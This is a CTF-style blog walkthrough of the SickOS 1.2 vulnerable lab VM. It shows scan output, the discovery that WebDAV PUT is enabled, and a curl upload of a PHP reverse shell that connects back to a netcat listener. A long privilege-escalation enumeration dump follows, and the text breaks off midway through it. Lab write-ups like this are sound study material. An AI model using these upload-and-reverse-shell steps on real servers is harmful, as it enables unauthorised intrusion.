Pages

Thursday 19 January 2017

SickOS 1.2

This document is for educational purposes only, I take no responsibility for other peoples actions. This is a review of SickOs 1.2 vulnarable VM: 
https://www.vulnhub.com/entry/sickos-12,144/

Home brewed tools used: https://github.com/iuristanchev/pentesting_tools

Currently scanning: Finished!   |   Screen View: Unique Hosts              
                                                                             
 5 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 300            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname    
 -----------------------------------------------------------------------------
 192.168.1.9     00:0c:29:98:f5:19      1      60  VMware, Inc.              

 Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-04 20:24 EET
Nmap scan report for 192.168.1.9
Host is up (0.00026s latency).
PORT   STATE SERVICE VERSION
80/tcp open  http    lighttpd 1.4.28
|_http-server-header: lighttpd/1.4.28
| http-useragent-tester:
|
|     Allowed User Agents:
|     Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
|     libwww
|     lwp-trivial
|     libcurl-agent/1.0
|     PHP/
|     Python-urllib/2.5
|     GT::WWW
|     Snoopy
|     MFC_Tear_Sample
|     HTTP::Lite
|     PHPCrawl
|     URI::Fetch
|     Zend_Http_Client
|     http client
|     PECL::HTTP
|     Wget/1.13.4 (linux-gnu)
|     WWW-Mechanize/1.34
|_
MAC Address: 00:0C:29:98:F5:19 (VMware)


 Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-04 20:26 EET
Nmap scan report for 192.168.1.9
Host is up (0.00016s latency).
PORT   STATE SERVICE
80/tcp open  http
| http-comments-displayer:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.9
|  
|     Path: http://192.168.1.9:80/
|     Line number: 96
|     Comment:
|         <!-- NOTHING IN HERE ///\\\ -->
|  
|     Path: http://192.168.1.9:80/
|     Line number: 96
|     Comment:
|_         ///\\\ -->>>>
MAC Address: 00:0C:29:98:F5:19 (VMware)

amap v5.4 (www.thc.org/thc-amap) started at 2017-01-04 20:34:33 - APPLICATION MAPPING mode

Total amount of tasks to perform in plain connect mode: 23
Waiting for timeout on 23 connections ...
Protocol on 192.168.1.9:80/tcp matches http - banner: HTTP/1.0 200 OK\r\nX-Powered-By PHP/5.3.10-1ubuntu3.21\r\nContent-type text/html\r\nContent-Length 163\r\nConnection close\r\nDate Wed, 04 Jan 2017 203433 GMT\r\nServer lighttpd/1.4.28\r\n\r\n<html>\n\n<img src="blow.jpg">\n\n</html>\n\n\n\n\n\n\n\n\n\n\n

DIRB v2.22  
By The Dark Raver
-----------------

START_TIME: Wed Jan  4 20:57:05 2017
URL_BASE: http://192.168.1.9:80/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt

-----------------

GENERATED WORDS: 20458                                                      

---- Scanning URL: http://192.168.1.9:80/ ----
==> DIRECTORY: http://192.168.1.9:80/test/                                  
+ http://192.168.1.9:80/~sys~ (CODE:403|SIZE:345)                            
                                                                             
---- Entering directory: http://192.168.1.9:80/test/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                      
    (Use mode '-w' if you want to scan it anyway)

*   Trying 192.168.1.9...
* Connected to 192.168.1.9 (192.168.1.9) port 80 (#0)
> OPTIONS /test/ HTTP/1.1
> Host: 192.168.1.9
> User-Agent: curl/7.47.0
> Accept: */*
>
< HTTP/1.1 200 OK
< DAV: 1,2
< MS-Author-Via: DAV
< Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
< Allow: OPTIONS, GET, HEAD, POST
< Content-Length: 0
< Date: Wed, 04 Jan 2017 21:01:06 GMT
< Server: lighttpd/1.4.28
<
* Connection #0 to host 192.168.1.9 left intact
nc -nlvp 443
curl --upload-file  /root/Desktop/pentesting_tools/tools/php-reverse-shell.txt -v --url http://192.168.1.9/test/shell.php -0 --http1.0

*   Trying 192.168.1.9...
* Connected to 192.168.1.9 (192.168.1.9) port 80 (#0)
> PUT /test/shell.php HTTP/1.0
> Host: 192.168.1.9
> User-Agent: curl/7.47.0
> Accept: */*
> Content-Length: 5495
>
* We are completely uploaded and fine
* HTTP 1.0, assume close after body
< HTTP/1.0 201 Created
< Content-Length: 0
< Connection: close
< Date: Wed, 04 Jan 2017 21:43:01 GMT
< Server: lighttpd/1.4.28
<
* Closing connection 0

nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.1.20] from (UNKNOWN) [192.168.1.9] 46960
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
 13:43:47 up  1:30,  0 users,  load average: 0.02, 0.04, 0.05
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: no job control in this shell
www-data@ubuntu:/$ whoami
whoami
www-data
www-data@ubuntu:/$

python -c 'import pty; pty.spawn("/bin/sh")'

cat /etc/debian_version
wheezy/sid

uname -v
#25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
#

Debug Info
thorough tests = disabled


Scan started at:
Thu Jan  5 09:43:36 PST 2017


### SYSTEM ##############################################
Kernel information:
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux


Kernel information (continued):
Linux version 3.11.0-15-generic (buildd@akateko) (gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) ) #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014


Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=12.04
DISTRIB_CODENAME=precise
DISTRIB_DESCRIPTION="Ubuntu 12.04.4 LTS"
NAME="Ubuntu"
VERSION="12.04.4 LTS, Precise Pangolin"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu precise (12.04.4 LTS)"
VERSION_ID="12.04"


Hostname:
ubuntu


### USER/GROUP ##########################################
Current user/group info:
uid=33(www-data) gid=33(www-data) groups=33(www-data)


Users that have previously logged onto the system:
Username         Port     From             Latest
root             pts/0    192.168.0.100    Tue Apr 26 03:57:15 -0700 2016
john             tty1                      Wed Mar 30 05:09:38 -0700 2016


All users and uid/gid info:
root:x:0:0
daemon:x:1:1
bin:x:2:2
sys:x:3:3
sync:x:4:65534
games:x:5:60
man:x:6:12
lp:x:7:7
mail:x:8:8
news:x:9:9
uucp:x:10:10
proxy:x:13:13
www-data:x:33:33
backup:x:34:34
list:x:38:38
irc:x:39:39
gnats:x:41:41
nobody:x:65534:65534
libuuid:x:100:101
syslog:x:101:103
messagebus:x:102:104
john:x:1000:1000
sshd:x:103:65534


Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)
uid=101(syslog) gid=103(syslog) groups=103(syslog)
uid=102(messagebus) gid=104(messagebus) groups=104(messagebus)
uid=1000(john) gid=1000(john) groups=1000(john),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)
uid=103(sshd) gid=65534(nogroup) groups=65534(nogroup)


Sample entires from /etc/passwd (searching for uid values 0, 500, 501, 502, 1000, 1001, 1002, 2000, 2001, 2002):
root:x:0:0:root:/root:/bin/bash
john:x:1000:1000:Ubuntu 12.x,,,:/home/john:/bin/bash


Super user account(s):
root


Are permissions on /home directories lax:
total 12K
drwxr-xr-x  3 root root 4.0K Mar 30  2016 .
drwxr-xr-x 22 root root 4.0K Mar 30  2016 ..
drwxr-xr-x  3 john john 4.0K Apr 12  2016 john


Root is allowed to login via SSH:
PermitRootLogin yes


### ENVIRONMENTAL #######################################
Path information:
/sbin:/bin:/usr/sbin:/usr/bin


Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash


Current umask value:
0000
u=rwx,g=rwx,o=rwx


umask value as specified in /etc/login.defs:
UMASK 022


Password and storage information:
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512


### JOBS/TASKS ##########################################
Cron jobs:
-rw-r--r-- 1 root root  722 Jun 19  2012 /etc/crontab

/etc/cron.daily:
total 72
drwxr-xr-x  2 root root  4096 Apr 12  2016 .
drwxr-xr-x 84 root root  4096 Jan  5 09:41 ..
-rw-r--r--  1 root root   102 Jun 19  2012 .placeholder
-rwxr-xr-x  1 root root 15399 Nov 15  2013 apt
-rwxr-xr-x  1 root root   314 Apr 18  2013 aptitude
-rwxr-xr-x  1 root root   502 Mar 31  2012 bsdmainutils
-rwxr-xr-x  1 root root  2032 Jun  4  2014 chkrootkit
-rwxr-xr-x  1 root root   256 Oct 14  2013 dpkg
-rwxr-xr-x  1 root root   338 Dec 20  2011 lighttpd
-rwxr-xr-x  1 root root   372 Oct  4  2011 logrotate
-rwxr-xr-x  1 root root  1365 Dec 28  2012 man-db
-rwxr-xr-x  1 root root   606 Aug 17  2011 mlocate
-rwxr-xr-x  1 root root   249 Sep 12  2012 passwd
-rwxr-xr-x  1 root root  2417 Jul  1  2011 popularity-contest
-rwxr-xr-x  1 root root  2947 Jun 19  2012 standard

/etc/cron.hourly:
total 12
drwxr-xr-x  2 root root 4096 Mar 30  2016 .
drwxr-xr-x 84 root root 4096 Jan  5 09:41 ..
-rw-r--r--  1 root root  102 Jun 19  2012 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x  2 root root 4096 Mar 30  2016 .
drwxr-xr-x 84 root root 4096 Jan  5 09:41 ..
-rw-r--r--  1 root root  102 Jun 19  2012 .placeholder

/etc/cron.weekly:
total 20
drwxr-xr-x  2 root root 4096 Mar 30  2016 .
drwxr-xr-x 84 root root 4096 Jan  5 09:41 ..
-rw-r--r--  1 root root  102 Jun 19  2012 .placeholder
-rwxr-xr-x  1 root root  730 Sep 13  2013 apt-xapian-index
-rwxr-xr-x  1 root root  907 Dec 28  2012 man-db


Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root    cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#


### NETWORKING  ##########################################
Network & IP info:
eth0      Link encap:Ethernet  HWaddr 00:0c:29:98:f5:19
          inet addr:192.168.1.9  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe98:f519/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:268 errors:0 dropped:0 overruns:0 frame:0
          TX packets:201 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:142432 (142.4 KB)  TX bytes:22042 (22.0 KB)
          Interrupt:19 Base address:0x2000

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)


Nameserver(s):
nameserver 192.168.1.1


Default route:
default         192.168.1.1     0.0.0.0         UG    100    0        0 eth0


Listening TCP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -            
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -            
tcp        0      0 192.168.1.9:56045       192.168.1.20:443        ESTABLISHED 984/php-cgi  
tcp        0      0 192.168.1.9:80          192.168.1.20:48676      ESTABLISHED -            
tcp6       0      0 :::22                   :::*                    LISTEN      -            


Listening UDP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -            


### SERVICES #############################################
Running processes:
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.5  0.1   3396  1832 ?        Ss   09:41   0:00 /sbin/init
root         2  0.0  0.0      0     0 ?        S    09:41   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S    09:41   0:00 [ksoftirqd/0]
root         4  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/0:0]
root         5  0.0  0.0      0     0 ?        S<   09:41   0:00 [kworker/0:0H]
root         6  0.1  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:0]
root         7  0.0  0.0      0     0 ?        S    09:41   0:00 [migration/0]
root         8  0.0  0.0      0     0 ?        S    09:41   0:00 [rcu_bh]
root         9  0.0  0.0      0     0 ?        S    09:41   0:00 [rcu_sched]
root        10  0.0  0.0      0     0 ?        S    09:41   0:00 [watchdog/0]
root        11  0.0  0.0      0     0 ?        S<   09:41   0:00 [khelper]
root        12  0.0  0.0      0     0 ?        S    09:41   0:00 [kdevtmpfs]
root        13  0.0  0.0      0     0 ?        S<   09:41   0:00 [netns]
root        14  0.0  0.0      0     0 ?        S<   09:41   0:00 [writeback]
root        15  0.0  0.0      0     0 ?        S<   09:41   0:00 [kintegrityd]
root        16  0.0  0.0      0     0 ?        S<   09:41   0:00 [bioset]
root        17  0.0  0.0      0     0 ?        S<   09:41   0:00 [kworker/u17:0]
root        18  0.0  0.0      0     0 ?        S<   09:41   0:00 [kblockd]
root        19  0.0  0.0      0     0 ?        S<   09:41   0:00 [ata_sff]
root        20  0.0  0.0      0     0 ?        S    09:41   0:00 [khubd]
root        21  0.0  0.0      0     0 ?        S<   09:41   0:00 [md]
root        22  0.0  0.0      0     0 ?        S<   09:41   0:00 [devfreq_wq]
root        23  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/0:1]
root        25  0.0  0.0      0     0 ?        S    09:41   0:00 [khungtaskd]
root        26  0.0  0.0      0     0 ?        S    09:41   0:00 [kswapd0]
root        27  0.0  0.0      0     0 ?        SN   09:41   0:00 [ksmd]
root        28  0.0  0.0      0     0 ?        SN   09:41   0:00 [khugepaged]
root        29  0.0  0.0      0     0 ?        S    09:41   0:00 [fsnotify_mark]
root        30  0.0  0.0      0     0 ?        S    09:41   0:00 [ecryptfs-kthrea]
root        31  0.0  0.0      0     0 ?        S<   09:41   0:00 [crypto]
root        43  0.0  0.0      0     0 ?        S<   09:41   0:00 [kthrotld]
root        44  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:1]
root        45  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_0]
root        46  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_1]
root        47  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:2]
root        48  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:3]
root        49  0.0  0.0      0     0 ?        S<   09:41   0:00 [dm_bufio_cache]
root        50  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:4]
root        69  0.0  0.0      0     0 ?        S<   09:41   0:00 [deferwq]
root        70  0.0  0.0      0     0 ?        S<   09:41   0:00 [charger_manager]
root        71  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/0:2]
root       193  0.0  0.0      0     0 ?        S<   09:41   0:00 [mpt_poll_0]
root       208  0.0  0.0      0     0 ?        S<   09:41   0:00 [mpt/0]
root       220  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_2]
root       221  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_3]
root       227  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_4]
root       229  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_5]
root       231  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_6]
root       232  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_7]
root       233  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_8]
root       234  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_9]
root       237  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_10]
root       238  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_11]
root       239  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_12]
root       240  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_13]
root       241  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_14]
root       242  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_15]
root       243  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_16]
root       244  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_17]
root       245  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_18]
root       246  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_19]
root       247  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_20]
root       248  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_21]
root       249  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_22]
root       250  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_23]
root       251  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_24]
root       252  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_25]
root       253  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_26]
root       254  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_27]
root       255  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_28]
root       256  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_29]
root       257  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_30]
root       258  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_31]
root       259  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:5]
root       260  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:6]
root       261  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:7]
root       262  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:8]
root       263  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:9]
root       264  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:10]
root       265  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:11]
root       266  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:12]
root       267  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:13]
root       268  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:14]
root       269  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:15]
root       270  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:16]
root       271  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:17]
root       272  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:18]
root       273  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:19]
root       274  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:20]
root       275  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:21]
root       276  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:22]
root       277  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:23]
root       278  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:24]
root       279  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:25]
root       280  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:26]
root       281  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:27]
root       282  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:28]
root       283  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:29]
root       284  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:30]
root       285  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:31]
root       286  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_32]
root       287  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:32]
root       379  0.0  0.0      0     0 ?        S    09:41   0:00 [jbd2/sda1-8]
root       380  0.0  0.0      0     0 ?        S<   09:41   0:00 [ext4-rsv-conver]
root       381  0.0  0.0      0     0 ?        S<   09:41   0:00 [ext4-unrsv-conv]
root       469  0.0  0.0   2832   608 ?        S    09:41   0:00 upstart-udev-bridge --daemon
root       471  0.0  0.1   3080  1296 ?        Ss   09:41   0:00 /sbin/udevd --daemon
102        547  0.0  0.0   3256   652 ?        Ss   09:41   0:00 dbus-daemon --system --fork --activation=upstart
syslog     557  0.1  0.1  30036  1472 ?        Sl   09:41   0:00 rsyslogd -c5
root       622  0.0  0.0   3020   812 ?        S    09:41   0:00 /sbin/udevd --daemon
root       623  0.0  0.0   3020   812 ?        S    09:41   0:00 /sbin/udevd --daemon
root       642  0.0  0.0      0     0 ?        S<   09:41   0:00 [ttm_swap]
root       706  0.0  0.0      0     0 ?        S<   09:41   0:00 [kpsmoused]
root       752  0.0  0.0   2844   348 ?        S    09:41   0:00 upstart-socket-bridge --daemon
root       797  0.0  0.0   2924   404 ?        Ss   09:41   0:00 dhclient3 -e IF_METRIC=100 -pf /var/run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -1 eth0
root       819  0.0  0.2   6680  2400 ?        Ss   09:41   0:00 /usr/sbin/sshd -D
root       899  0.0  0.0   4628   840 tty4     Ss+  09:41   0:00 /sbin/getty -8 38400 tty4
root       903  0.0  0.0   4628   836 tty5     Ss+  09:41   0:00 /sbin/getty -8 38400 tty5
root       907  0.0  0.0   4628   844 tty2     Ss+  09:41   0:00 /sbin/getty -8 38400 tty2
root       908  0.0  0.0   4628   832 tty3     Ss+  09:41   0:00 /sbin/getty -8 38400 tty3
root       912  0.0  0.0   4628   836 tty6     Ss+  09:41   0:00 /sbin/getty -8 38400 tty6
root       920  0.0  0.0   2616   884 ?        Ss   09:41   0:00 cron
daemon     921  0.0  0.0   2468   348 ?        Ss   09:41   0:00 atd
www-data   966  0.0  0.2   8272  2236 ?        S    09:41   0:00 /usr/sbin/lighttpd -f /etc/lighttpd/lighttpd.conf
www-data   968  0.0  0.4  17844  4720 ?        Ss   09:41   0:00 /usr/bin/php-cgi
www-data   982  0.0  0.1  17844  1752 ?        S    09:41   0:00 /usr/bin/php-cgi
www-data   983  0.0  0.1  17844  1752 ?        S    09:41   0:00 /usr/bin/php-cgi
www-data   984  0.0  0.2  18100  3072 ?        S    09:41   0:00 /usr/bin/php-cgi
www-data   985  0.0  0.1  17844  1752 ?        S    09:41   0:00 /usr/bin/php-cgi
root      1003  0.0  0.0   4628   836 tty1     Ss+  09:41   0:00 /sbin/getty -8 38400 tty1
root      1187  0.0  0.0  22584   564 ?        Ssl  09:41   0:00 /usr/sbin/vmware-vmblock-fuse -o subtype=vmware-vmblock,default_permissions,allow_other /var/run/vmblock-fuse
root      1206  0.1  0.5  11268  5660 ?        S    09:41   0:00 /usr/sbin/vmtoolsd
root      1230  0.0  0.7  14736  7840 ?        S    09:41   0:00 /usr/lib/vmware-vgauth/VGAuthService -s
www-data  1243  0.0  0.0   2232   544 ?        S    09:41   0:00 sh -c uname -a; w; id; /bin/bash -i
www-data  1247  0.0  0.1   3448  1708 ?        S    09:41   0:00 /bin/bash -i
www-data  3185  0.2  0.1   3412  1428 ?        S    09:43   0:00 /bin/bash ./1.sh
www-data  3467  0.0  0.0   3384   644 ?        S    09:43   0:00 /bin/bash ./1.sh
www-data  3468  0.0  0.1   2860  1032 ?        R    09:43   0:00 ps aux


Process binaries & associated permissions (from above list):
-rwxr-xr-x 1 root root 920788 Mar 28  2013 /bin/bash
-rwxr-xr-x 2 root root  26696 Mar 29  2012 /sbin/getty
-rwxr-xr-x 1 root root 194528 Jan 18  2013 /sbin/init
-rwxr-xr-x 1 root root 177552 Jul 19  2013 /sbin/udevd
lrwxrwxrwx 1 root root     25 Apr 12  2016 /usr/bin/php-cgi -> /etc/alternatives/php-cgi
lrwxrwxrwx 1 root root     37 Mar 30  2016 /usr/lib/vmware-vgauth/VGAuthService -> /usr/lib/vmware-tools/bin32/appLoader
-rwxr-xr-x 1 root root 187332 Dec 20  2011 /usr/sbin/lighttpd
-rwxr-xr-x 1 root root 531776 Jan 13  2016 /usr/sbin/sshd
lrwxrwxrwx 1 root root     37 Mar 30  2016 /usr/sbin/vmtoolsd -> /usr/lib/vmware-tools/sbin32/vmtoolsd
lrwxrwxrwx 1 root root     37 Mar 30  2016 /usr/sbin/vmware-vmblock-fuse -> /usr/lib/vmware-tools/bin32/appLoader


/etc/init.d/ binary permissions:
total 144
drwxr-xr-x  2 root root 4096 Apr 12  2016 .
drwxr-xr-x 84 root root 4096 Jan  5 09:41 ..
-rw-r--r--  1 root root    0 Mar 30  2016 .legacy-bootordering
-rw-r--r--  1 root root 2427 Jul 26  2012 README
-rwxr-xr-x  1 root root 4596 Sep 25  2012 apparmor
lrwxrwxrwx  1 root root   21 Oct 25  2011 atd -> /lib/init/upstart-job
-rwxr-xr-x  1 root root 2444 Jul 26  2012 bootlogd
lrwxrwxrwx  1 root root   21 Apr 19  2012 console-setup -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 Jun 19  2012 cron -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 Jun 13  2013 dbus -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 Nov 26  2013 dmesg -> /lib/init/upstart-job
-rwxr-xr-x  1 root root 1242 Dec 13  2011 dns-clean
lrwxrwxrwx  1 root root   21 Mar 14  2012 friendly-recovery -> /lib/init/upstart-job
-rwxr-xr-x  1 root root 1105 Dec 15  2015 grub-common
-rwxr-xr-x  1 root root 1329 Jul 26  2012 halt
lrwxrwxrwx  1 root root   21 May 26  2011 hostname -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 Mar 29  2012 hwclock -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 Mar 29  2012 hwclock-save -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 Feb  3  2012 irqbalance -> /lib/init/upstart-job
-rwxr-xr-x  1 root root 1293 Jul 26  2012 killprocs
-rwxr-xr-x  1 root root 2545 Aug 19  2010 lighttpd
lrwxrwxrwx  1 root root   21 Nov 20  2011 module-init-tools -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 Sep 19  2013 network-interface -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 Sep 19  2013 network-interface-container -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 Sep 19  2013 network-interface-security -> /lib/init/upstart-job
-rwxr-xr-x  1 root root 2797 Feb 13  2012 networking
-rwxr-xr-x  1 root root  882 Jul 26  2012 ondemand
lrwxrwxrwx  1 root root   21 Sep 12  2012 passwd -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 May 16  2013 plymouth -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 May 16  2013 plymouth-log -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 May 16  2013 plymouth-ready -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 May 16  2013 plymouth-splash -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 May 16  2013 plymouth-stop -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 May 16  2013 plymouth-upstart-bridge -> /lib/init/upstart-job
-rwxr-xr-x  1 root root  561 Feb  4  2011 pppd-dns
lrwxrwxrwx  1 root root   21 Oct 28  2013 procps -> /lib/init/upstart-job
-rwxr-xr-x  1 root root 8635 Jul 26  2012 rc
-rwxr-xr-x  1 root root  801 Jul 26  2012 rc.local
-rwxr-xr-x  1 root root  117 Jul 26  2012 rcS
-rwxr-xr-x  1 root root  639 Jul 26  2012 reboot
lrwxrwxrwx  1 root root   21 Sep  8  2012 resolvconf -> /lib/init/upstart-job
-rwxr-xr-x  1 root root 4395 Nov  8  2011 rsync
lrwxrwxrwx  1 root root   21 Nov 26  2013 rsyslog -> /lib/init/upstart-job
-rwxr-xr-x  1 root root 4321 Jul 26  2012 sendsigs
lrwxrwxrwx  1 root root   21 Apr 19  2012 setvtrgb -> /lib/init/upstart-job
-rwxr-xr-x  1 root root  590 Jul 26  2012 single
-rw-r--r--  1 root root 4304 Jul 26  2012 skeleton
-rwxr-xr-x  1 root root 4371 Jan 13  2016 ssh
